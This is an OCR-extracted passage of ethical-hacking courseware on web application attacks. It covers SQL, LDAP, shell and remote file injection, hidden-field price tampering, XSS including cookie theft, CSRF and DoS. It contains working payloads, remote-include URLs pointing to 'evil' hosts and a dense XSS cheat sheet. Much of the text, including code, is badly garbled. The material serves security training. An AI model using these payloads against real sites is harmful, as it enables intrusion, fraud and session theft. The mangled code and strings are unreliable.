Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Perform queries against data in the database, often even data to which the application would not normally have access
Modify the database contents, or drop the database altogether Use the trust relationships established between the web application components to access other databases mi
Web Browser
A
test');DROP TABLE Messages;
When this code is sent to the database server, it drops the Messages table
01
<?php function save email(?user, ?message) < $sql = "INSERT INTO Messages ( user, message ) VALUES ( '?user', '?message' )"; return mysql query($sql); } ?>
SQL Injection vulnerable server code
Internet
02 03 04 05 06 07 08 09 10 11
test'),
('user2',
'1 am Jason'),
Cuser3'
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
An attacker tries to craft an input string to gain shell access to a web server Shell Injection functions include and similar APIs
s y s te m (),s ta rtP ro c e s s (),
j a v a . l a n g . R u n t im e . e x e c ( ) , S y s t e m . D i a g n o s t i c s . P r o c e s s . S t a r t ( ) ,
This type of attack is used to deface websites virtually. Using this attack, an attacker adds an extra HTML-based content to the vulnerable web application In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting
J
J
The attacker exploits this vulnerability and injects malicious code into system files
http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system (), Start Process (), java.lang.Runtime.exec (), System.Diagnostics.Process.Start (), and similar APIs.
H TM L Embedding
This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting.
File Injection
a The attacker exploits this vulnerability and injects malicious code into system files: http://www.iuggvbov.com/vulnerable.php?COLOR=http://evil/exploit Users are allowed to upload various files on the server through various applications and those files can be accessed through the Internet from any part of the world. If the application ends with a php extensionand if any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
www.juggyboy.cam/baimer.gifl|newpassword||1036 |60|468
Ju g g y B o y c o m
User Name Email Address
Password [ newpassword
Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword"
The server script assumes that only the URL of the banner image file is inserted into that field
Poor input validation at server script was exploited in this attack that uses database INSERT and UPDATE record command
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M [ .................> I \
f h ttp //juggYbov/cgi bin/lspro/lspfo cgi ?hit out 1036
Malicious code:
w w w .^ u g g y b o y .c o m /b a n n e r .g ifl|n e w p a s s w o r d l|1 0 3 6 1601468
.com
UM f Name Addison
] ] !
Poor input validation at server script was exploited in this attack that uses database INSERT and UPDATE record command
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
(is s e t (
$ _ G E T ['D R IN K ']
= . ' .p h p
$d dr rin k re q u u ii r re e ((
$ _G ET [ 'D R IN K '] ;
);
J $ d r in k
?>
< / s e le c t >
: ....
e
A ttacker
File injection attacks enable attackers to e xp lo it vulnerable scripts on the server to use a rem ote file instead o f a presumably trusted file fro m the local file system
F i le I n j e c t i o n A tta c k
Users are allowed to upload various files on the server through various applications and those files can be accessed through the Internet from anywhere in the world. If the application ends with a php extension and if any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. Consider the following client code running in a browser: <form method="get"> < s e le ct name="DRINK"> Coption value= "p ep si"> p ep si< /option> Coption value= "coke"> coke< /option> < /select> <input typ e= "subm it"> </forra>
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
if
);
php
code,
the
attacker
injects
a remotely
hosted
file
at
Exploit code
http://www.iuggvbov.com/orders. php?DRlNK=http://iasoneval.com/exploit?
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
W h a t Is L D A P In je c tio n ?
I
CEH
(rtifwtf itfciul Nm Im
An LDAP in je c tio n te c h n iq u e is used to ta k e ad va n ta g e o f n o n -v a lid a te d w e b a p p lic a tio n in p u t v u ln e ra b ilitie s to pass LDAP filte r s used fo r se a rch in g D ire c to ry Services to o b ta in d ire c t access to d a taba ses b e h in d an LDAP tre e
(* W J Q J V) p H
a.
LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries
(a t tr ib u te N a m e
o p e ra to r
v a lu e )
Example
(a b je c t c la s s = u s e r )
>=
(m d b S t o r a g e Q u o t a > = l 0 0 0 0 0 )
<=
(m d b S t o r a g e Q u o t a < = l 0 0 0 0 0 )
~= LDAP is based on the client-server model and clients can search the directory entries using filters * AND
( d i s p 1 a yN a m e ~ =F o e c k e 1 e r )
(0 A
( d is p la y N a m e * J o h n * )
(& )
(& ( o b j e c t c l a s s - u s e r ) (d is p la y N a m e Jo h n )
OR ( |) N O T(!)
( | ( o b j e c t c l a s s = u s e r ) ( d is p la y N a m e = J o h n )
( f o b je c tC la s s = g r o u p )
W h a t is L D A P I n j e c t i o n ?
An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All the inputs to the LDAP must be properly filtered, otherwise vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed based on LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail. These services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. It is based on the client-server model and clients can search the directory entries using filters.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
( a t t r ib u t e N a m e
o p e ra to r v a lu e ) Example
( d i s p la y N a m e ~ = F o e c k e le r )
( d i s p la y N a m e = * J o h n * )
AND (&)
(S (o b je c tc la s s = u s e r )(d is p la y N a m e = Jo h n )
O R (|) N O T (I)
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Norm al R esult
LDAP
LDAP Server Client
LDAP
LDAP Server
Client
LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate LDAP query To test if an application is vulnerable to LDAP code injection, send a query to the server meaning that generates an invalid input. Ifthe LDAP server returns an error, it can be exploited with code injection techniques
Account Login
|
1Vv.\ Attacker
Username : Password
juggyboy)(&)) blah
Submit
If an attacker enters valid user name "juggyboy", and injects juggyboy)(&)) then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)) only the first filter is processed by the LDAP server, only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password
H ow LD A P In je c tio n W o rk s
(H U LDAP injection attacks are commonly used on web applications. LDAP is applied to any of the applications that have some kind of user inputs used to generate the LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. Depending upon the implementation of the target, one can try to achieve: Q Q Login Bypass Information Disclosure Privilege Escalation Information Alteration
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Normal operation
Norm al Q uery
Norm al Result
Client
FIGURE 13.11: Normal operation
LDAP Server
<
N orm al Result and/or Additional Inform ation
c LDAP
LDAP Server
Client
FIGURE 13.12: Operation with code injection
Attack
If an attacker enters a valid user name of juggyboy" and injects juggyboy) ( &) ) , then the URL string becomes (& ( u s e r =juggyboy) (&)) (PA SS= blah)). Only the first filter is processed by the LDAP server; only the query (& (USER= juggyboy) (&)) is processed. This query is always true, and the attacker logs into the system without a valid password.
A c c o u n t Login
Usernam e : Password Attacker
juggyboy)(&))
blah
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Normal Request
a c tio n ^ "p a g e .a s p x "> <i n p u t " P R IC E " v a l u e 2 0 0 . 0 0 " >" < in p u t ty p e = S h ir t "X b r> v a lu e =
Attack Request
P r o d u c t nam e:
ty p e = " s u b m it"
0 0
When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST) HTML can also store field values as hidden fields, which are not rendered to the screen by the browser, but are collected and submitted as parameters during form submissions Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to server
Juggyboy Shirt ^
0
[ 200
)
Submit 6
Copyrigh t b y
H i d d e n F i e l d M a n i p u l a t i o n A tta c k
Hidden manipulation attacks are mostly used against ecommerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including price of the product (Including discount rates). At the time of development of these such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the prices of the product and complete a transaction with price that he or she has altered, rather than the actual price of the product. For example: On eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, often it also loses its credibility in the market. W hen any target requests web services and makes choices on the HTML page, then the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). The HTML pages generally save field values as hidden fields and they are not displayed on the monitor of the target but saved and placed in the form of strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to the server. <input type=hidden" name= "P R IC E " value= "200. 00>
Module 13 Page 1779 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Product name: <input type= " t e x t " name="product" value= "Juggyboy S h ir t "x b r > Product p r ic e : 200. 00"><br>
<input type= "subm it" value= 1 'submit"> </form> 1. 2. 3. 4. 5. Open the html page within an HTML editor. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>"). Modify its content to a different value (e.g. "<type=hidden name=price value=2.00>"). Save the html file locally and browse it. Click the Buy button to perform electronic shoplifting via hidden manipulation.
HTM L Code
< fo rm m e th o d = "p o s t" t y p e = " 1 1 id d e n " nam e: < in p u t nam e= ty p e =
Hidden Field Price = 200.00 Attack Request h t t p :/ / www. ju g g y b o y . com /page. a s p x ? p r o d u c t= Ju g g yb o y% 2 0 S h i r t & p r i c e = 2 .00
v a lu e = "Ju g g y b o y
ty p e = "s u b m it"
1 ! "
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C ross-site s c rip tin g (,XSS' or'CSS') attacks e x p lo it v u ln e ra b ilitie s in d y n a m ic a lly g e n e ra te d w e b pages, w hich enables m a licio u s attackers to in je c t c lie n t-s id e s c rip t in to w eb pages vie w e d by o th e r users It occurs w h e n in v a lid a te d in p u t d a ta is in clu d e d in d yn a m ic c o n te n t th a t is sen t to a user's w e b b ro w se r f o r re n d e rin g A ttackers in je c t m a lic io u s JavaScript, VBScript, A ctiveX, HTML, o r Flash fo r e xe cution on a v ic tim 's system by h id in g it w ith in le g itim a te re quests
Session hijacking
privilegesuserExploitingI
Data theft
^ ^
Intranet probing
'1
manipulation
Data
C r o s s - S ite S c r i p t i n g (XSS) A t ta c k s
Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses web applications and sends malicious code in JavaScript to different end users. It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. W hen a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions. An attacker often uses different methods to encode the malicious portion (Unicode) of the tag, so that a request seems genuine to the user. Some of them are: Q Q Malicious script execution - Session hijacking Brute force password cracking - Redirecting to a malicious server Exploiting user privileges - Data theft Intranet probing - Ads in hidden !FRAMES and pop-ups Data manipulation - Keylogging and remote monitoring
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
H o w X SS A tta c k s W o rk
Normal Request
CEH
This example uses a rable page which handles for a nonexistent pages, a classic 404 error page
Server
hypothetical example.
Normal Request
h t t p : / / ju g g y b o y .c o m / a s o n _ f i l . h t m l
Server Code
u r ld e a o d e ($ _ S E R V E R [" R E Q U E S T _ U R I" ] ) ;
?>
Server Response
n
Server
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
User clicks the malicious link
S en d s em ail w ith
m a lic io u s link
HR EF=httD;//juggybQ y. co m / ....
M alicious c o d e is ex e c u te d o n t h e client w eb b ro w se r
<...............
Attacker
In this example, the attacker crafts an email message with a malicious script and sends it to the victim: <A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t i o n . c g i ? c l i e n t p r o f i l e = < S C R I P T > m a l ic io u s c o d e c / S C R I P T C l i c k here</A> When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code The legitimate server sends a page back to the user including the value of c l i e n t p r o f i l e , and the malicious code is executed on the client machine
C r o s s - S ite S c r i p t i n g A tt a c k S c e n a r io : A tt a c k v i a E m a i l
In a crosssite scripting attack via email, the attacker crafts an email that contains a link to malicious script and sends it to the victim. Malicious Script: <A HREF=h t t p : / / le g it im a t e S i t e . c o m / r e g is tr a tio n . c g i? c lie n tp r o file = < S C R IP T > m a lic io u s c o d e < / S C R IP T C lic k here</A> W hen the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. Then the server sends a page back to the user including the value of client profile and the malicious code is executed on the client's machine. The following diagram depicts the cross-site scripting attack scenario attack via email:
EC-C0UnCil
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
rrr 1
U ser's B ro w s e r
M a lic io u s S crip t
A tta c k e r's S e rv e r
L e g itim a te S e rve r
<A H R E F= h t t p : / / j u g g y b o y b a n k . c a n /
a malicious link
M i
the URL to user and convince user to click on it _ Request the page
o .................. !
Page with malicious script
Run
......
XSS E x a m p l e : A tta c k v i a E m a i l
The following are the steps involved in an XSS attack via email: 1. Construct a malicious link: <AHREF=h t t p : //ju g g y b o y b a n k .co m / re g istra tio n . c g i? c lie n tp r o file = < S C R IP T > m a lic io u s code</SCRIPT>>Click here</A> 2. 3. 4. 5. Email the URL to the user and convince the user to click on it. User requests the page. Legitimate server sends a response page with malicious script. Malicious script runs on the user's browser.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
IS
User's Browser Malicious Script Attackers Server Legitimate Server
< A H R E F = h t t p : / / ^ u g g y b o y b e in k . c o m /
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
M a lic io u s S crip t
A tta c k e r's S e rv e r
^^v kView i e w the page hostea hosted Dy by the attacker HTML containing malicious s c r i p t !
...................... .................. - !
Run Collect user's cookies Redirect to attacker's server < ........................ ( Send the request with the user's cookies
XSS E x a m p l e : S t e a l i n g U sers* C o o k i e s
To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vu nerabilities and then installs a cookie stealer (cookie logger). The following are the various steps involved in stealing user's cookies with the help of XSS attack: 1. Attacker initially hosts a page with malicious script 2. The user visits the page hosted by attacker 3. The attacker's server sends the response as HTML containing malicious script 4. The user's browser runs the HTML malicious script
5. The Cookie Logger present in the malicious script collects user's cookies 6. The malicious script redirects the user to attacker's server 7. The user's browser sends the request with the user's cookies
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
a
1 I page w ith malicious script
Malicious Script
Attacker's Server
User's Browser
Attacker's
Server
I
Run
........ >
Collect users cookies
!<.........
....d ' i
&
FIGURE 13.18: Stealing Users' Cookies
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
M a lic io u s S crip t
A tta c k e r's S e rv e r
A tta c k e r's S e rv e r
.........*
II
Page with malicious script An authorized request
Run
XSS E x a m p l e : S e n d in g a n U n a u t h o r i z e d R e q u e s t
Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request: 1. Attacker constructs a malicious link 2. Sends an email containing the URL to user and convinces user to click on it
3. The user's browser sends a request to the attacker's server for the page 4. The attacker's server in response to the user's request sends the page with malicious script 5. The user's browser runs the malicious script 6. The malicious script sends an authorized request
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
4a
Malicious code <script>onload= window.location:
Web Application
Malicious W ebsite
Malicious code
Attacker adds a malicious script in the com m ent field of blog post
Database Server
Web Application
Malicious Website
CEH
Facebook acquires file-sharing service New York-based start-up that lets users privately and spcxadicaty share fles through a drag-anddrop interface with additional options------
C om m ent
Jason, I love your blog post! -Made (mark@miccasoft.com)
Malicious code
< s c r ip t a le r t (" H e ll o W or I d " ) </ s c r i p t>
H
H*ln World
Comment with malicious link is stored on the server Database Server W eb Application
I < * ......i
Pop up W indo w
J
....
XSS A tta c k in a C o m m e n t F i e l d
Many Internet web programs use HTML pages that dynamically accept data from
different sources. The data in the HTML pages can be dynamically changed according to the request. Attackers use the HTML web page's tags to manipulate the data and to launch the attack by changing the comments feature with a malicious script. When the target sees the comment and activates it, then the malicious script is executed on the target's browser, initiating malicious performances.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
aas
1 IcchP oM 1 ------- ---------- -
Attacker
Leave your com m ent Jason, 11ova your blog post! < s c rip t> a le rt(H e llo W o rld " ) < / s c r i p t >
Malicious code
< s c rip t> a le r t("H e ll o W o r ld ")< / s c r ip t >
Database Server
Web Application
Pop up Window
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
X SS C h e a t S h e e t
XSS locator: !;-<XSS>=&{()} Normal XSS JavaScript injection: <SCRIPT SRC=http://haxkers.org/xss.jsx/S C R IPT > Image XSS: <IMG SRC=javascript:alert(XSS>;( N o q u o tesa n d no semicolon: <IMG SRC=javascript:alert(XSS')> Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS>) HTML entities: <1MG SRC=javasa ipt: ale rt (&q u o t;XSS&q u o t; )> Grave accent obfuscation: <IMG SRC= javascript :alert(" RSnake says, 'XSS'T> M alformed IMG tags:<IMG " xSCRIPT>aiertf XSS" )</SCRIPT>" > Embedded tab: <IMG SRCJav ascript:alert('XSS');H > Embedded encoded tab: <IMG SRC jav& #x09;asalpt:ale rt (,XSS);" > Embedded tab: <IMG SRC="jav ascript:alert('XSS');"> Embedded encoded tab: <IMG SRCjav& #x09;asalpt:alert(XSS;(,> Em beded new line: <IMG SRC="jav&#xOA;ascript:alert('XSS');"> Embedded carriage return: <1MG SRC jav&#xOD;asaipt :alertfXSS> ;( NuN Chars: peri -e 'p rint "<1MG SRC=java\Osai p t: ale rt(\"XSS\" )>";'> out Non-aipha-non-digit XSS: <SCR1PT/XSS SRChttp://ha.dcers. 0fg/xss.js'x/SCRlPT>
CEH
UttifM itkiul
M m f e w
IMG Dynsrc: <1MG DYNSRC Javasaipt 3 lert<XSS> ( IMG lowsrc:<IMG DYNSRC jav a sa lp t: ale rtf XSS>( IMG lowsrc:<IMG LOWSRC "javasaipt :alert('XSS'("< BGSOUND:<BGSOUND SRC javasaipt :ale rt )XSS< ";( LAYER:<LAYER SRC= "http://haxkers.org/scriptlet.htm rx/LA Y ER > STYLE sh ee t: <LINK REL H stylesheet HREF " javasaipt :ale rt( XSS>;( Local htcfile:<XSSSTYLE" behavk>r: urHxssJttc);"> VBsaipt in an Image: <IMG SRC*v b s a ip t:m sgbox(XSS")> Mocha: <IMG SRC" livesaipt:[code]''> US-ASCII encoding: isaiptualert(EXSSE)i/saiptu META:<META HTTP-EQUIV*refresh CONTENT="0;uH=javasaipt:aiert(XSS>;) TABLE:<TABLE BACKGROUN Djav a sa ip t: alert( XSS>( TD:<TABLExTD BACKGROUN D Javasaipt :alert(XSS>(
Non-alpha-non-digit part 2 XSS: <BODY onload ! # $ % & ( ) - + 1 / ] @?;:,.\ K '= a le 1t< XSS>) Extraneous open brackets: SCRIPT>alert( XSS");///SCRlPT> No closing script tags: <SCRIPT SRChttp://ha.ckers.org/xss .js?<B> Protocol resolution in s a ip t tags: <SCRIPT SRC/ /h a x k e rs.org/.j> Half open HTML/JavaScript XSS vector: <IMG SRC=javascript :alert('XSS')" Double open angle brackets: <lframe src h ttp ://h a.c k e rs.org/saiptlet.htm i < XSS with no single qu o tes or double quotes or semicolons: SCRIPT>alert (/XSS/source K/SCRIPT> Escaping JavaScript escapes: \";alertCXSS');// End title tag: </TTTLExSCRIPT>ale rt(XSS<;)/SCRIPT> INPUT im age :<IN PUT TYPE " IMAGE" SRC="javasaipt :alert('XSS');">
XSS C h e a t S h e e t
XSS locator '.- <XSS> = *{()} Norm al XSS Ja va Script in action <SCRIPT SRC=nttp y/ha tte rs org/css.jsx7 SCRIPT>
Embedded carriage return: dM G SRC = 'jj0^ *rO O .ascn p te*ertfX SS> ; M * O m n pert-e ,p ra t '< M G SRC-yava\05cnpte*ertf\*XSSV > out MG (SK iC ^ clM G
0 v N s * c aist1 ju sd i s t
M G Ifw V C < M 6 *GSO UN D .BGSO UN D
6 * *
Mo q u otn 4 m xm icoto: <1MG Case *sen sitrve XSS a tta o vecto r <WAG
Wona!pr-nonStg:t XSS <SCR1FT/XSS SRC= nttpy/ha ckers org/1 <ss.jsxVSCRIFT> p v t 2 XSS <SOOY ) * - ? * I / - X S S > > Evtraneous open brackets <<SCRlRT>aJert ( TCSS y//5 C W FT >
S^ W O B S a R S JU S C ft* >
LAYER *LAVER SRC *H ttpy/ba.Aers.org/scr1ptiet-M m J x/lA YER > STYLE sheet: <UNK R E U - d # c fo rc T
Protocol resolution m scnpt tags < SCRIPT T C SS")> SRC=//fca.clters.org/.j> Ha*f ope WTML/JavaScnp t X 5 vector d M G SR C = *|vaoq njt^ ier^ X SS7' Dootrte open an$te Dradcets < & rjO X Uj=tTttpy/ha.ckers.org/5cr1pt*et.tJtm< < XSS w rtt bo saagte quotes or doable q v o i n or sermcotoag: SCR*T>lert(/XSS/-S01rce></Sa1FT> Escaping Ja v a S o ft escapes W a te r* x s s y / Ena title tag < /T IT lEx SC R rT > alert(XSS^</SOOFT>
in p u t
M e !form es IM G tags d M G * * xSC R fPT > aJert{ X SS<> /SCRlPT>*> Emoedded ta tr d M G SRC=*jav w ^ t a k f ^ TCSS'J;> Em oeooes encoded tab : <IMG SRC=*|jQ(a1c09;a5cnpt a Je rtt'X S S '^ >
US-ASOI encoding g O T p yt> m lEX SSE fJ x z > p lv M ET A xM ET A W TTP-EQU/Vr-refiesir CONTENT= 0 :art=^avascnpt aftert fx SS > * TABLE cTABLE BACXG ROUNO= ^ T D x T A U fx T O IACKGROUM>= tva5 crt a*ertfTCSS7> f ft JTCSS')r >
im age * in p u t t y p e =* im \ g e *
'iMKratf,c s s ,^ >
FIGURE 13.22: XSS Cheat Sheet
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C r o s s - S i t e R e q u e s t F o r g e r y (C S R F ) A tta c k
J
c El \
Cross-Site R equest F o rgery (CSRF) a tta c k s e x p lo it w e b p a g e v u ln e ra b ilitie s th a t a llo w an a tta c k e r to fo rc e an u n s u s p e c tin g user's b ro w s e r to send m a lic io u s re quests th e y d id n o t in te n d
The v ic tim user h o ld s an a c tiv e session w ith a tru s te d s ite and s im u lta n e o u s ly visits a m a lic io u s site , w h ic h in je c ts an HTTP re q u e s t fo r th e tru s te d s ite in to th e v ic tim user's session, c o m p ro m is in g its in te g rity
fc
User
Logs into the trusted site and creaitesa news! :sion Stores the session ident fierforthe session in a cookie in the web browser
Malicious Website
___
..... 1
...
41!
C r o s s - s i t e R e q u e s t F o r g e r y (C S R F ) A tta c k
Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed to send a request to the venerable website through a malicious web page. CSRF vulnerabilities are very commonly found on financial-related websites. Corporate intranets usually can't be accessed by the outside attackers so CSRF is one of the sources to enter into the network. The lack of the web application to differentiate a request done by malicious code from a genuine request exposes it to CSRF attack. Cross-Site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
O
User
Logs into the trusted site and creates a new se sion !esslon Identffl er for the Stores the s session In a clookle In the w eb browser
Trusted W ebsite
Malicious W ebsite
Sends a request from the user's browser using his session cookie
> a ft
Visits a ma
III
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
H ow C SR F A tta c k s W o rk
In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user to click on a malicious link containing arbitrary code. W hen the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The following diagram explains the step-by-step process of a CSRF attack:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S e rve r Code
o
Server sets a session cookie In the user's browser Malicious code is executed in the trusted server
& &
i s s e t ($_REQUEST [ s h a re s ' ] ) )
{ b u y _ s t o c k s ($ _ R E Q U E S T [ s y m b o l ] , $_REQUEST[ s h a r e s ] ) ; }
r
Trusted Server
<p>Symbol: <input type= "text" name-symbor /x/p> <p>Shares: <input type-'text" name='shares'' /></p> <pxinput type="submit" value="Buy'' /></p> </form>r
?>
Attacker sends a phishing mail tricking user to send a request to a malicious site
Attacker
Response page contains malicious code
M alicious Code
0
User requests a page from the malicious server
Malicious Server
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
W h y A re A p p lications V u ln e ra b le ?
W eb S e rv ic e s U n a v a ila b ility
Targets
i : : i : CPU, Memory, and Sockets Disk Bandwidth Database Bandwidth
BOB BOB
same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection measures : :
- Worker Processes
W e b A p p l i c a t i o n D e n i a l o fS e r v ic e (D oS) A tta c k
______ Denial-of-service attacks happen when the legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers. The following issues make the web applications vulnerable: 0 Reasonable Use of Expectations
Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection measures. In web application denial-of-service attack the attacker targets and tries to exhaust CPU, memory, Sockets, disk bandwidth, database bandwidth, and worker processes.
Some of the common ways to perform a web application DoS attack are:
0 Bandwidth consumption-flooding a network with data
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Resource starvation-depleting a system's resources Programming flaws-exploiting buffer overflows Routing and DNS attacks-manipulating DNS tables to point to alternate IP addresses
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application
Login Attacks
The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond
User Enumeration
If application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application
The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site
D e n i a l o fS e r v ic e (D oS ) E x a m p l e
Most web applications are designed to serve or withstand with limited requests. If the limit is exceeded, the web application may fail the server the additional requests. Attackers use advantage to launch denial-of-service attacks on the web applications. Attackers send too many requests to the web application until it gets exhausted. Once the web application receives enough requests, it stops responding to other request though it is sent by an authorized user. This is because the attacker overrides the web application with false requests. Various web application DoS attacks include: 6
User Registration DoS: The attacker could create a program that submits the
registration forms repeatedly adding a large number of spurious application. users to the
User Enumeration: W hen the application responds to any user authentication process
with the error message declaring the area of incorrect information, then the attacker can easily manipulate the procedure by brute forcing the common user names from a dictionary file to estimate the users of the application.
Module
13 Page 1801
EC-C0UnCil
Account Lock-Out Attacks: Dictionary attacks can be minimized by applying the account lock method. The attacker may enumerate user names through vulnerability in the application and then attempt to authenticate the site using valid user names and incorrect passwords that will lock out the accounts after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables Attackers modify function pointers used by the application to direct program execution through a jump or call instruction and points it to a location in the memory containing malicious codes
V Vulnerable Code
i n t m a in (in t a rg c , c h a r * a r g v []) ch a r *d e s t_ b u ffe r; d e s t _ b u f f e r = (c h a r * ) m a l l o c ( 1 0 ) ; if (N ULL = -1 ; { d e s t_ b u f f e r ) {
re tu rn if
(a r g c > 1 )
Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow
Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited.
B u f f e r O v e r f lo w A t t a c k s
